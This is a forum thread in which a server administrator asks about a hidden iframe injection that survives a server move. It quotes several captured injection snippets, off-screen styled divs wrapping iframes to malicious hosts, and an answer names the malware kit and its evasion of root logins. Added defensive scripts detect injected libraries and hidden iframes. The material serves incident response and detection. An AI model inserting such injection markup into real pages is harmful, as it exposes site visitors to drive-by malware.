iFrame Injection Attack Followed us to New Server

Question


A few months ago, a hidden iFrame started showing up on every page on every site on our dedicated server. When we took the sites down for maintenance with a 503, the iFrame was still there on the down for maintenance page. Eventually, the host blocked the source of the iFrame, but we never found the backdoor. The injected iFrame looked something like this, but wrapped in a style tag to obfuscate and with various URLs:

iframe src="http://heusnsy.nl/32283947.html..

We moved our smaller sites to a different host, and they've been fine.

We moved our main site to a new dedicated server on the same host, and despite our efforts to lock down the server - firewalls, restricted access, software updates, inspecting every file - the iFrame returned.

We've looked everywhere to locate how this is getting in - config files, htaccess - but can't find it.

Any idea where the hidden iFrame injection vulnerabilities could be?

Edit : Here are more details: Linux machine running Apache and PHP. Latest versions of everything. The code that was injected looks like this:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

Update : Here is more information and what we have learned:

host: Station CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 on x86_64 / Apache version 2.2.15 - PHP 5.3.3 (cli) (built: Jul 3 2012 16:53:21)

  1. Server itself is not compromised.

  2. All the services including (apache/php) are upgraded to the latest versions available for our system.

  3. No accounts (ftp or otherwise) were compromised.

  4. Malware changes its destination URL (iframe src=) simultaneously on several infected sites. (Courtesy of unmaskparasites.com)

  5. During the change of the src target, no rogue or hidden processes were executed/running.

  6. tcpdump captured the malware code as it left on TCP port 80, but nothing strange was found in the GET request from the user receiving the malware, and nothing strange was found in the corresponding Apache access logs either.

  7. Website files and the httpd/php binaries were not changed in any way during the switch of the iFrame's src URL (courtesy of an md5sum check).

  8. No rogue connections were made on the known ports for the known services during the change. The firewall takes care of the rest.

  9. rkhunter and maldet came up with no results.

  10. Malware iFrame gets triggered and injected right after the first "</script>" tag on any page having this tag, on all accounts and websites on this server.

  11. Malware gets injected into static pages and on sites without database connections. (it is enough for the page to have <head> </script></head> tags)

  12. No rogue apache modules or php modules (excluding mycript.so) were installed. Most of the default apache modules are suspended and commented out.

  13. Malware is not constantly present. It comes and goes: sometimes it's off for several hours, then shows up for several users and goes out again, making it extremely hard to trace.

  14. 100% of the PHP code and most of the JavaScript code running on our sites (except phpMyAdmin) is custom coded. The only thing that is not are the jQuery libs.

The server is a high-traffic machine and searching/matching in logs is extremely slow. The weekly access log can exceed 15 GB.

That's the situation... It's no longer a matter of compromised accounts, hacked files, rogue scripts. This is something beyond anything we've seen so far and the cause is hidden somewhere in the apache/php itself. (At least this is what we think). Any help or ideas are much appreciated.

Here are examples of the iFrame injection:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left:-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div>

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" width="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.html" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>
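Points 7 and 12 above verify the on-disk httpd/php binaries and the module configuration, but neither shows what code is actually mapped into the running httpd workers: a library pulled in through LD_PRELOAD or /etc/ld.so.preload, or a module loaded and then unlinked from disk, leaves every md5sum intact and need not appear in httpd.conf. The following is an added example, not code from the original thread, that audits /proc/<pid>/maps of a worker against the set of paths the package manager owns. The maps text and the owned-file set are constructed samples; on a CentOS box the real allowlist would be built by running `rpm -qf` over each mapped path (and `rpm -V httpd php` to recheck the package checksums), and the directory list is an assumption about where legitimate code lives.

```python
"""Audit which shared objects a running httpd worker has actually mapped,
against what the package manager owns (added example; not from the thread)."""
import re

# /proc/<pid>/maps columns: address range, perms, offset, dev, inode, path.
MAPS_LINE = re.compile(
    r"^[0-9a-f]+-[0-9a-f]+\s+(?P<perms>\S{4})\s+\S+\s+\S+\s+\d+\s*(?P<path>.*)$")
# Where legitimately installed code lives on a CentOS 6 web server (assumption).
SYSTEM_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/bin", "/usr/sbin")

# Constructed sample maps output for one httpd worker; the last two .so entries
# are invented to stand in for an injected library (one already unlinked on disk).
SAMPLE_MAPS = """\
00400000-00440000 r-xp 00000000 fd:01 123 /usr/sbin/httpd
7f0a10000000-7f0a10020000 r-xp 00000000 fd:01 456 /usr/lib64/httpd/modules/mod_rewrite.so
7f0a10020000-7f0a10220000 ---p 00020000 fd:01 456 /usr/lib64/httpd/modules/mod_rewrite.so
7f0a10400000-7f0a10480000 r-xp 00000000 fd:01 458 /usr/lib64/httpd/modules/libphp5.so
7f0a10600000-7f0a10700000 r-xp 00000000 fd:01 999 /usr/lib64/libsystm.so.1
7f0a10800000-7f0a10900000 r-xp 00000000 fd:01 998 /dev/shm/.s/inj.so (deleted)
7ffd00000000-7ffd00021000 rw-p 00000000 00:00 0 [stack]
"""

# Constructed stand-in for what `rpm -qf <path>` would report on the sample box.
SAMPLE_OWNED = {
    "/usr/sbin/httpd",
    "/usr/lib64/httpd/modules/mod_rewrite.so",
    "/usr/lib64/httpd/modules/libphp5.so",
}


def mapped_executables(maps_text):
    """Map each file-backed executable mapping to whether its backing file is deleted."""
    result = {}
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        path = m.group("path").strip()
        if not path.startswith("/"):          # [stack], [heap], [vdso], anonymous
            continue
        deleted = path.endswith(" (deleted)")
        if deleted:
            path = path[: -len(" (deleted)")]
        if "x" in m.group("perms"):
            result[path] = deleted or result.get(path, False)
    return result


def audit_maps(maps_text, package_owned):
    """Return (path, [reasons]) for each executable mapping that looks suspicious."""
    findings = []
    for path, deleted in sorted(mapped_executables(maps_text).items()):
        reasons = []
        if deleted:
            reasons.append("backing file deleted; code survives only in memory")
        if path not in package_owned:
            reasons.append("not owned by any installed package")
        if not path.startswith(SYSTEM_DIRS):
            reasons.append("outside system library/binary directories")
        if reasons:
            findings.append((path, reasons))
    return findings


def audit_pid(pid, package_owned):
    """Run the same audit on a live process (Linux only)."""
    with open(f"/proc/{pid}/maps") as f:
        return audit_maps(f.read(), package_owned)


if __name__ == "__main__":
    for path, reasons in audit_maps(SAMPLE_MAPS, SAMPLE_OWNED):
        print(path)
        for r in reasons:
            print("   -", r)
```

Run it against every httpd worker, not just the parent: `for p in $(pgrep httpd); do ...; done`, and run it from cron rather than an interactive shell, since the answer below notes that the malware goes quiet while root or an SSH session is present. A mapping whose backing file is deleted, or whose path no package owns, is the thing an md5sum of /usr/sbin/httpd can never show.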

Solution

Check it... the miscreant author of the program that jacked up your server is known as "Left4Dead"; his iframe injection doo-hicky is called "BlackLeech." You can find this gent and his advert on Damagelab .org (CRIMINAL FORUM!!).

Every time root logs in, or you SSH into your server, the malware ceases all activity. It also monitors system monitoring tools :|

Screen shot of Damagelab .org advert:

http://imgur.com/NRQQl

Text of malware advert by the author:

http://pastebin.com/u7AcYSNi

Notice how your thread is listed as a reference :))

If you need help with translation, hit me up!
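Points 10 and 11 of the question describe the injection pattern (a <style> rule pushing a random class far off-screen, then a <div> of that class wrapping the iframe, emitted right after the first </script>, or the same markup via document.write), and the answer says the malware goes quiet whenever root or an SSH session is present. Together those argue for checking from outside: fetch the page as an ordinary client from another host, diff it against the on-disk file, and flag iframes that are hidden by off-screen CSS. The following added example, not code from the original thread, does exactly that on constructed HTML; the iframe URLs and class names echo the post's samples, but the pages themselves are made up, and the -500px threshold for "off-screen" is an assumption.

```python
"""Compare a served page with its on-disk source and flag iframes hidden by
off-screen CSS (added example; not code from the original thread)."""
import difflib
import re
from html.parser import HTMLParser

# Constructed samples (not captured from the poster's server): ON_DISK is the
# file under the docroot, SERVED is what an outside client actually received.
ON_DISK = """<html><head>
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script>
<script>var x = 1;</script>
<title>Example</title></head><body><p>hello</p></body></html>
"""

SERVED = """<html><head>
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>
<script>var x = 1;document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.html" width="559" height="135"></iframe></div>');</script>
<title>Example</title></head><body><p>hello</p></body></html>
"""

CSS_RULE = re.compile(r"\.([\w-]+)\s*\{([^}]*)\}")
DOC_WRITE = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.S)
VOID_TAGS = {"meta", "link", "br", "img", "input", "hr", "base"}


def offscreen_classes(css, threshold=-500):
    """Class names whose rule is position:absolute with left or top at or below threshold px."""
    hidden = set()
    for name, body in CSS_RULE.findall(css):
        decls = {}
        for decl in body.split(";"):
            if ":" in decl:
                key, val = decl.split(":", 1)
                decls[key.strip().lower()] = val.strip().lower()
        if decls.get("position") != "absolute":
            continue
        for axis in ("left", "top"):
            m = re.match(r"-?\d+", decls.get(axis, ""))
            if m and int(m.group()) <= threshold:
                hidden.add(name)
    return hidden


class _Scanner(HTMLParser):
    """Collects <style> text and every <iframe> together with its ancestors' classes."""

    def __init__(self):
        super().__init__()
        self.css, self.iframes, self.stack = [], [], []
        self.tag, self.script = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self.tag = tag
        classes = set((a.get("class") or "").split())
        if tag == "iframe":
            self.iframes.append((a.get("src", ""), set().union(*self.stack) | classes, "markup"))
        if tag not in VOID_TAGS:
            self.stack.append(classes)

    def handle_endtag(self, tag):
        if tag == "script":
            # Variant seen in the post: the same markup emitted via document.write().
            for _, literal in DOC_WRITE.findall("".join(self.script)):
                sub = _Scanner()
                sub.feed(literal)
                sub.close()
                self.css.extend(sub.css)
                self.iframes.extend((s, c, "document.write") for s, c, _ in sub.iframes)
            self.script = []
        self.tag = None
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        if self.tag == "style":
            self.css.append(data)
        elif self.tag == "script":
            self.script.append(data)


def find_hidden_iframes(html, threshold=-500):
    """(src, hiding class, how it was emitted) for every iframe under an off-screen element."""
    s = _Scanner()
    s.feed(html)
    s.close()
    hidden = offscreen_classes("".join(s.css), threshold)
    return [(src, sorted(cls & hidden)[0], via) for src, cls, via in s.iframes if cls & hidden]


def injected_lines(on_disk, served):
    """Lines in the served response that differ from the file Apache should have sent."""
    diff = difflib.unified_diff(on_disk.splitlines(), served.splitlines(), lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


if __name__ == "__main__":
    for src, cls, via in find_hidden_iframes(SERVED):
        print(f"hidden iframe -> {src} (class {cls}, via {via})")
    for line in injected_lines(ON_DISK, SERVED):
        print("injected:", line[:80])
```

Because the injection comes and goes (point 13), a single fetch proves little; poll from a host outside the server, with a browser-like User-Agent, and keep the raw responses so a hit can be matched against the access log entry for that exact request.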
